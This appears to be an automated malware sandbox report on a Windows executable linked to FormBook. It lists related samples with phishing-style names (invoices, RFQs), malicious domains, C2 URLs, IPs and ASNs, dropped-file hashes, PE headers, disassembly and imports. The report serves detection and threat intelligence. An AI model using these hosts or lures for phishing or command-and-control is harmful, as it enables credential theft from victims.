	COTA#U00c7#U00c3O #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	www.augaqfp.lol/e00j/
	RFQ for Maintenance usering for Sabratha Project.exe	Get hash	malicious	FormBook	Browse	www.yfbrhvs.lol/jx62/
	ftrrrttyt.exe	Get hash	malicious	FormBook	Browse	www.augaqfp.lol/e00j/
	Project REEM HILLS DEVELOPMENT PUBLIC REALM LANDSCAPE PHASE 1 - AL REEM ISLAND, ABU DHABI.exe	Get hash	malicious	FormBook	Browse	www.augaqfp.lol/l8a4/
	Required quotations data list.exe	Get hash	malicious	FormBook	Browse	www.lfghtko.lol/o9ka/
	profoma invoice 06042024_pdf.exe	Get hash	malicious	FormBook	Browse	www.skpjqav.lol/obrg/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.zhuan-tou.com	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	103.120.80.111
www.shrongcen.com	Proforma Invoice.docx.doc	Get hash	malicious	FormBook	Browse	165.154.98.92
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	101.36.121.143
	1PTLWkB6Xv.img	Get hash	malicious	FormBook	Browse	117.50.32.166
webuyfontana.com	RFQ for Maintenance usering for Sabratha Project.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
webuyfontana.com	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
td-ccm-neg-87-45.wixdns.net	tEBdYCAxQC.rtf	Get hash	malicious	FormBook	Browse	34.149.87.45
	https://loginaccount70.wixsite.com/my-site-2/	Get hash	malicious	Unknown	Browse	34.149.87.45
	Invitation to Tender (ITT) - TED-DRL-2024-024 - Supply PDF.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	https://ssgjsghxj.wixsite.com/my-site-1	Get hash	malicious	Unknown	Browse	34.149.87.45
	2OdHcYtYOMOepjD.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	PR-ZWL 07364G49574(Revised PO).exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	http://hfjh612.wixsite.com/my-site-1	Get hash	malicious	Unknown	Browse	34.149.87.45
	DRAFT 99577590.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
www.lunareafurniture.com	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	172.67.160.38
www.ie8mce.website	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
www.ie8mce.website	1PTLWkB6Xv.img	Get hash	malicious	FormBook	Browse	176.113.70.180
www.chowzen.top	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
www.am1-728585.com	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	101.36.121.143
	1PTLWkB6Xv.img	Get hash	malicious	FormBook	Browse	117.50.32.166
	nr 133764ZMA2024.exe	Get hash	malicious	FormBook	Browse	117.50.32.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASIANETGB	dokaz o uplati.exe	Get hash	malicious	DBatLoader, FormBook	Browse	176.113.70.180
	QUOTATION #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
	COTA#U00c7#U00c3O #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
	ftrrrttyt.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
	RFQ2024563429876-9887877654.exe	Get hash	malicious	FormBook	Browse	176.113.70.180
	1PTLWkB6Xv.img	Get hash	malicious	FormBook	Browse	176.113.70.180
	HRJiIRr1Hp.elf	Get hash	malicious	Unknown	Browse	155.235.143.179
	L7WxAhwd3D.elf	Get hash	malicious	Mirai	Browse	155.235.118.11
	HMa0p4jRup.elf	Get hash	malicious	Mirai	Browse	155.235.118.65
ACPCA	dokaz o uplati.exe	Get hash	malicious	DBatLoader, FormBook	Browse	162.0.213.72
	2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	W5TnMyRi78vdxpf.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	IMG___001.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	SecuriteInfo.com.Win32.PWSX-gen.7953.6248.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.0.217.91
	QSX0atAPpN.elf	Get hash	malicious	Mirai	Browse	162.34.137.113
	Payment.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	CFV20240600121.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	kLvAyodXfb.elf	Get hash	malicious	Mirai	Browse	162.8.38.22
	http://vccs.work	Get hash	malicious	Unknown	Browse	162.0.217.157
CLOUDIVLIMITED-ASCloudIvLimitedHK	dokaz o uplati.exe	Get hash	malicious	DBatLoader, FormBook	Browse	116.213.43.190
	quote.vbs	Get hash	malicious	FormBook	Browse	116.213.43.190
	swift copy USD65000.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	QUOTATION #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	COTA#U00c7#U00c3O #U2013 RFQ 000535.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	r14836901-5B4A-.exe	Get hash	malicious	FormBook, GuLoader	Browse	116.213.43.190
	RFQ for Maintenance usering for Sabratha Project.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	ftrrrttyt.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Project REEM HILLS DEVELOPMENT PUBLIC REALM LANDSCAPE PHASE 1 - AL REEM ISLAND, ABU DHABI.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
	Required quotations data list.exe	Get hash	malicious	FormBook	Browse	116.213.43.190
CKL1-ASNKE	hmips-20240612-1156.elf	Get hash	malicious	Mirai	Browse	102.202.78.244
	PO 05588060624.exe	Get hash	malicious	FormBook	Browse	102.222.124.13
	p0O65nRvEc.elf	Get hash	malicious	Mirai	Browse	102.200.150.31
	NRxJduEvLG.elf	Get hash	malicious	Mirai	Browse	102.4.237.190
	gt4t3NAdEr.elf	Get hash	malicious	Mirai	Browse	102.239.70.2
	8MFpF2RpG1.elf	Get hash	malicious	Mirai	Browse	102.194.241.228
	52N2ePfSI1.elf	Get hash	malicious	Mirai	Browse	102.206.160.251
	hmips-20240611-0256.elf	Get hash	malicious	Mirai	Browse	102.239.112.196
	SecuriteInfo.com.Linux.Siggen.9999.27902.26281.elf	Get hash	malicious	Mirai	Browse	102.220.41.148

Process:	C:\Users\user\Desktop\pismo1A 12.06.2024.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.9752009295145765
Encrypted:	false
SSDEEP:	384:mxQaPt4DgCxWUAnPnom14EfD8B5vQmyYPk3a6GsJJDNM+nfM:+LPSDgCQUgom14EkvQYPGa6HbMT
MD5:	0303D4CF12D123B39529BC4DBFBB88D1
SHA1:	C974BBEF9225EE89AFA009390EADF182EC3F8B2D
SHA-256:	46372CF0FD4CE6B1C1413D43B861B8E0418BB050E906A292660AB411C7E819A5
SHA-512:	40C75ECD5ED681A846F73C15D8CEA7E89CD1D41634DD6452CF105F40A610B1EFE1D98FDC0FF6C3EC9C85B9F8DE0F9320157F90BD602F3DD517CFB9BBE47ACB01
Malicious:	false
Reputation:	low
Preview:	/y467cdd72ddbd/3/1/14748a95c/1/1/1577:3675a:56/1/1/1577:3e77ab63/1/1/1577:4679a95f/1/1/1577:367ba:56/1/1/1577:3e7dab5d/1/1/1577:467fa924/1/1/1577:3681a:23/1/1/1577:3e83ab1f/1/1/1577:4685a955/1/1/1577:3687a:5d/1/1/1577:3e89ab5d/1/1/1577:468b24b1577:368da:5f/1/1/1577:7e35egegegab65/1/1/1577:8637egegega955/1/1/1577:7639egegega:5d/1/1/1577:7e3begegegab5d/1/1/1577:863degegega91f/1/1/1577:763fegegega:55/1/1/1577:7e41egegegab5d/1/1/1577:8643egegega95d/1/1/1577:7645egegeg24b:577:7e47egegegab66/1/1/1577:46c1a964/1/1/1577:36c3a:56/1/1/1577:3ec5ab63/1/1/1577:46c7a924/1/1/1577:36c9a:23/1/1/1577:3ecbab1f/1/1/1577:46cda955/1/1/1577:36cfa:5d/1/1/1577:3ed1ab5d/1/1/1577:46d324b1577:36d5a:52/1/1/1577:7e59egegegab55/1/1/1577:865begegega967/1/1/1577:765degegega:52/1/1/1577:7e5fegegegab61/1/1/1577:8661egegega95:/1/1/1577:7663egegega:24/1/1/1577:7e65egegegab23/1/1/1577:8667egegega91f/1/1/1577:7669egegega:55/1/1/1577:7e6begegegab5d/1/1/1577:866degegega95d/1/1/1577:766fegegeg24b:577:3e71ab64/1/1/1577:46`1a959

C:\Users\user\AppData\Local\Temp\_R39449

Download File

Process:	C:\Windows\SysWOW64\write.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autAD5B.tmp

Download File

Process:	C:\Users\user\Desktop\pismo1A 12.06.2024.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	7.99405126653018
Encrypted:	true
SSDEEP:	6144:a+sJoKnWzlc31T3SVd+5Ev62u450rH5oDXe3Mv4mfRH:a+OoDzE1TiVd+GS450zdcv4A1
MD5:	DB6785E9322897354FE19BF85D0AC3D4
SHA1:	40A149185C562422409A323009DDE774174BE772
SHA-256:	4CD0CE24B2B2E0BCA5066C5469ECBA0A84DBEBC4F49F27F15ABBA3E8E49D3CFB
SHA-512:	E6E803398D25093B291F29908C6588A8F096A2E12645489AC52D2D1A52D56D482EF9D3952B80FE4B8D19472D774BC240B5E9A3C18B500EF8613A1B5D1E506077
Malicious:	false
Reputation:	low
Preview:	.....8X4Hm.[...v.JA...`6R...YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQ.9YU[U.DB.Q.i.[....=<9s:0W?F)Xz23W7:!j1/bJ-Zh\4q.v.u8%7/l5U>l5ZQR9YU,KZ..X?.uU=.oY>.O...xX?.R..nY>.O...~X?..\99oY>.UJSJB8X4.pZQ.8XU..4.B8X4H5ZQ.9[T^KXJB6\4H5ZQR9YU.^SJB(X4H.^QR9.UUZSJB:X4N5ZQR9YUSJSJB8X4H.^QR;YUUJSJ@8..H5JQR)YUUJCJB(X4H5ZQB9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YU{>6268X4.8^QR)YUUDWJB(X4H5ZQR9YUUJSJb8XTH5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4

C:\Users\user\AppData\Local\Temp\autADB9.tmp

Download File

Process:	C:\Users\user\Desktop\pismo1A 12.06.2024.exe
File Type:	data
Category:	dropped
Size (bytes):	9800
Entropy (8bit):	7.616146589312375
Encrypted:	false
SSDEEP:	192:GLTFrdgchQCoz6ypNlm9ZjBXVUWSXWWFju5qk4PrTxzfbjN4JyKlusYVBupuL3q:SRucozbm9xcHXWau+TTxzzx4JMsUBuQq
MD5:	141CBFE04D5A98F15E681F7C840F2EE9
SHA1:	9F6BC8B3A2867110ED52B8427BD4A899FC6E23B2
SHA-256:	39F5CDCEFAF9C6C2B30583A799E8ED3353D9FA5A4013517319D052A5598CC9B5
SHA-512:	DC0DA8A85FE14A6F15BDB319517703238783EA27AE8499EF817EBD7CAA7B07CEEA48F1753B1AE169405C6C8EAC64695F43731BA62AC887DCF874A40882C162AB
Malicious:	false
Reputation:	low
Preview:	EA06..p...f.i...d...K.._3..e....i8..f.0.._1.....o5...`...f.{..m3....A9.6,........XlS[ ...f..fS@.oN&6....k.;,.ga.L@..4.N&.........6.@.o.r....,S)....V@...S.{,.ke... ....g.i...c ._..m3...d....H,@......Ad.H..g...0.F..=e.L@.>....C`...M.02..N....u......I..ca..]>.......@x>;......@j.;.......j.;.....L@j.;$....@'.d.5...@.^.M../Z...#^...h.#..z.m1.H....S....#.`..N.B=7.........n.... >_L....Y.\|........`.R...M&....k9....f.....{.........x.....I..l...$..6,.._...f...fv[..g.a..l\|39..j......K..@4.;.#G.a.h.,6`.o..1...fv[.....M.SP./..7....@..%.....Y.4.b.X..y..ke...39....xY&.Y..d.)..F.9....ed.....:.Y..Y.....,......5/...bg3..4.Y..`....n./...v.......c..f.p.Ff...F`.....R.."_:........,v`.....ae...`.Fj.Y.,..c.....l.0+.g1..f.!...,vb......9... ... .....f@...J'.).....~.!92.X...c6....d......40.....f`....f....ic....6.-..p..S...gb...@....,vh...-.ua..,...n.....f....L'SI.......vj...... .E......y6....p.c3{-..3..,`!....F ...B5d..'..N........c.`....;,..(..f.!...,vn...\|.kb..&. .Fh.)...f....L.

C:\Users\user\AppData\Local\Temp\scroll

Download File

Process:	C:\Users\user\Desktop\pismo1A 12.06.2024.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	7.99405126653018
Encrypted:	true
SSDEEP:	6144:a+sJoKnWzlc31T3SVd+5Ev62u450rH5oDXe3Mv4mfRH:a+OoDzE1TiVd+GS450zdcv4A1
MD5:	DB6785E9322897354FE19BF85D0AC3D4
SHA1:	40A149185C562422409A323009DDE774174BE772
SHA-256:	4CD0CE24B2B2E0BCA5066C5469ECBA0A84DBEBC4F49F27F15ABBA3E8E49D3CFB
SHA-512:	E6E803398D25093B291F29908C6588A8F096A2E12645489AC52D2D1A52D56D482EF9D3952B80FE4B8D19472D774BC240B5E9A3C18B500EF8613A1B5D1E506077
Malicious:	false
Reputation:	low
Preview:	.....8X4Hm.[...v.JA...`6R...YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQ.9YU[U.DB.Q.i.[....=<9s:0W?F)Xz23W7:!j1/bJ-Zh\4q.v.u8%7/l5U>l5ZQR9YU,KZ..X?.uU=.oY>.O...xX?.R..nY>.O...~X?..\99oY>.UJSJB8X4.pZQ.8XU..4.B8X4H5ZQ.9[T^KXJB6\4H5ZQR9YU.^SJB(X4H.^QR9.UUZSJB:X4N5ZQR9YUSJSJB8X4H.^QR;YUUJSJ@8..H5JQR)YUUJCJB(X4H5ZQB9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YU{>6268X4.8^QR)YUUDWJB(X4H5ZQR9YUUJSJb8XTH5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4H5ZQR9YUUJSJB8X4

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.145290443697329
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pismo1A 12.06.2024.exe
File size:	1'257'472 bytes
MD5:	1dc0ef58fcd118eda3e4e6db7f790655
SHA1:	eeaf577a39f32004a26863b48a551e3150e1e9c6
SHA256:	445c00e14a4a3eaf7e11d2858d4c963d8ce5c31ccbdff0fb275436357d6ce5c0
SHA512:	847d484b47f9b6e603cded70bb2b921030aefb9c78673d9ef3f0106b7179cc4c468ba9cd2202f2985c8339168ea18e468ccac5c88d8f0e03cd765b850eb6576d
SSDEEP:	24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a3CswWnPk71SNhDB/lJ6XRvfp:VTvC/MTQYxsWR7a3nwWn8BSjwf
TLSH:	1645C00273D1D022FFAB92334B5AF6515BBC69260123E62F13981D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6668E3FF [Tue Jun 11 23:55:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F0CA0F959D3h
jmp 00007F0CA0F952DFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F0CA0F954BDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F0CA0F9548Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F0CA0F9807Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F0CA0F980C8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F0CA0F980B1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5c548	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x131000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5c548	0x5c600	f639ed4eb310777c82d969544bdd9cc4	False	0.9308715324763194	data	7.901162402181594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x131000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0x53bae	data			1.0003236547915488
RT_GROUP_ICON	0x12ffc0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x130038	0x14	data	English	Great Britain	1.15
RT_VERSION	0x13004c	0x10c	data	English	Great Britain	0.5895522388059702
RT_MANIFEST	0x130158	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, 